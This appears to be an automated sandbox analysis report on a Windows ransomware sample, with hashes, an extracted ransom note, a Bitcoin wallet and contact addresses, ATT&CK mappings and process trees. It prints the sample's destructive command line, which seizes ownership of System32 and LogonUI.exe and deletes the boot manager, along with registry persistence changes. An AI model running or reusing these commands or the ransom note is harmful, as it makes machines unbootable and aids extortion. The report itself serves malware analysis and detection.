78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201

General

Target

HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
Size

6.1MB
MD5

04df8dd30da8b5853f48cc1ac9b695a8
SHA1

4c02262c2fea0e99277a99dcbe28a9c370b87c39
SHA256

78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
SHA512

3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
SSDEEP

3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE

Score

10^/10

discovery evasion exploit persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

Ransom Note

Ooops! All your important files are encrypted! What happend to my computer? All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $50. How do i pay? Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom of the sheet. Contact: 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us (LegionLocker@mail2tor.com) In case of no anwser in 72 hours write us to this email: CobraLocker@mail2tor.com What if i already paid? Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software, it may cause pernament data loss. Our Bitcoin address: 131fjhrB4wH8j6adZXudp1Wn23pR33tpAh

Emails

LegionLocker@mail2tor.com

CobraLocker@mail2tor.com

Wallets

131fjhrB4wH8j6adZXudp1Wn23pR33tpAh

URLs

http://mail2tor2zyjdctd.onion/

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

Disables Task Manager via registry modification
evasion

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\SyncSwitch.png => C:\Users\Admin\Pictures\SyncSwitch.png.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

Possible privilege escalation attempt 7 IoCs
exploit

Processes:

takeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

1240 takeown.exe
1756 takeown.exe
1328 icacls.exe
1136 takeown.exe
852 icacls.exe
1704 takeown.exe
2020 icacls.exe
Modifies file permissions 1 TTPs 7 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

1240 takeown.exe
1756 takeown.exe
1328 icacls.exe
1136 takeown.exe
852 icacls.exe
1704 takeown.exe
2020 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1240	takeown.exe
1756	takeown.exe
1328	icacls.exe
1136	takeown.exe
852	icacls.exe
1704	takeown.exe
2020	icacls.exe

pid	process
1240	takeown.exe
1756	takeown.exe
1328	icacls.exe
1136	takeown.exe
852	icacls.exe
1704	takeown.exe
2020	icacls.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp"	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1092 NOTEPAD.EXE

pid	process
1092	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

pid	process
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
Token: SeDebugPrivilege	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
Token: SeTakeOwnershipPrivilege	1756	takeown.exe
Token: SeTakeOwnershipPrivilege	1136	takeown.exe
Token: SeTakeOwnershipPrivilege	1704	takeown.exe
Token: SeTakeOwnershipPrivilege	1240	takeown.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.execmd.execmd.exe

description	pid	process	target process
PID 980 wrote to memory of 1484	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	cmd.exe
PID 980 wrote to memory of 1484	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	cmd.exe
PID 980 wrote to memory of 1484	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	cmd.exe
PID 1484 wrote to memory of 1756	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1756	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1756	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1328	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 1328	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 1328	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 1136	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1136	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1136	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 852	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 852	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 852	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 1704	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1704	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1704	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 2020	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 2020	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 2020	1484	cmd.exe	icacls.exe
PID 1484 wrote to memory of 1240	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1240	1484	cmd.exe	takeown.exe
PID 1484 wrote to memory of 1240	1484	cmd.exe	takeown.exe
PID 980 wrote to memory of 560	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	cmd.exe
PID 980 wrote to memory of 560	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	cmd.exe
PID 980 wrote to memory of 560	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	cmd.exe
PID 980 wrote to memory of 1092	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	NOTEPAD.EXE
PID 980 wrote to memory of 1092	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	NOTEPAD.EXE
PID 980 wrote to memory of 1092	980	HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe	NOTEPAD.EXE
PID 560 wrote to memory of 1108	560	cmd.exe	rundll32.exe
PID 560 wrote to memory of 1108	560	cmd.exe	rundll32.exe
PID 560 wrote to memory of 1108	560	cmd.exe	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe"
1⤵
- Modifies WinLogon for persistence
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1328

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:852

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2020

C:\Windows\system32\takeown.exe
takeown /f C:\bootmgr
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
2⤵
- Suspicious use of WriteProcessMemory
PID:560

C:\Windows\system32\rundll32.exe
rundll32 user32.dll,UpdatePerUserSystemParameters
3⤵
PID:1108

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:1092

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

File Permissions Modification

1

T1222

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
Filesize
1KB

MD5
7db09a04d53ec49b19596d7836ac2286

SHA1
f92b734a6fd58d4a729d14f32bd69d588d03fb70

SHA256
eb07471b556a3a18b04c9f14d98f0d8345f6a249a74eea2148af19b50c97c5e7

SHA512
fc597891e55cfd69aaf709d20f89c088c6e4632a0f1b3286aaee2d22f98a7f01aaff1f8ec2660086f3434a02d4ea9fa0a5df60eac95abe9be56be8aee6d92897

Download Submit
memory/560-64-0x0000000000000000-mapping.dmp

Download
memory/852-60-0x0000000000000000-mapping.dmp

Download
memory/980-55-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

Filesize
8KB

Download
memory/980-70-0x000000001B856000-0x000000001B875000-memory.dmp

Filesize
124KB

Download
memory/980-69-0x000000001B856000-0x000000001B875000-memory.dmp

Filesize
124KB

Download
memory/980-54-0x00000000013D0000-0x00000000019F0000-memory.dmp

Filesize
6.1MB

Download
memory/1092-65-0x0000000000000000-mapping.dmp

Download
memory/1108-67-0x0000000000000000-mapping.dmp

Download
memory/1136-59-0x0000000000000000-mapping.dmp

Download
memory/1240-63-0x0000000000000000-mapping.dmp

Download
memory/1328-58-0x0000000000000000-mapping.dmp

Download
memory/1484-56-0x0000000000000000-mapping.dmp

Download
memory/1704-61-0x0000000000000000-mapping.dmp

Download
memory/1756-57-0x0000000000000000-mapping.dmp

Download
memory/2020-62-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads